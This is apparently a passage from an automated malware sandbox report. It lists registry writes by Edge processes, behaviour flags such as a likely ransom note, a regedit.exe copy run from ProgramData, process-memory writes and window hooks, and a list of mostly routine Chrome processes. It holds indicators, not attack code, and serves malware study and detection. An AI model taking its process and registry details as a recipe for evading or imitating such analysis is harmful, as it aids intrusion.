| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_enUS_DavidM" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile - English (United States)" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\sidubm.table" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\c1033.fe" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.google.com\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{C6FABB24-E332-46FB-BC91-FF331B2D51F0}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "French Phone Converter" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "436;41c;401;801;c01;1001;1401;1801;1c01;2001;2401;2801;2c01;3001;3401;3801;3c01;4001;42b;42c;82c;42d;423;402;455;403;c04;1004;1404;41a;405;406;465;413;813;809;c09;1009;1409;1809;1c09;2009;2409;2809;2c09;3009;3409;425;438;429;40b;80c;c0c;100c;140c;180c;456;437;807;c07;1007;1407;408;447;40d;439;40e;40f;421;410;810;44b;457;412;812;440;426;427;827;42f;43e;83e;44e;450;414;814;415;416;816;446;418;419;44f;c1a;81a;41b;424;80a;100a;140a;180a;1c0a;200a;240a;280a;2c0a;300a;340a;380a;3c0a;400a;440a;480a;4c0a;500a;430;441;41d;81d;45a;449;444;44a;41e;41f;422;420;820;443;843;42a;540a" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\AI041033" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1c7278aff6b7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 01faa7aff6b7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\tn1033.bin" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40A;C0A" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SR Engine (11.0) Text Normalization" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Speech HW Voice Activation - English (United States)" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = 322d9a43ff74693161317f9e26a7d6bb591a6f276432e10543a70c26e1b357a5 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
| N/A | N/A | C:\ProgramData\soft\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Red rp\Info.txt"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe8b449758,0x7ffe8b449768,0x7ffe8b449778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1632 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2888 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2896 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4492 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5052 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1732 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5204 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1648 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4600 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4720 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3a4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3724 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5336 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5268 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=7060 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5316 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6872 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6612 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
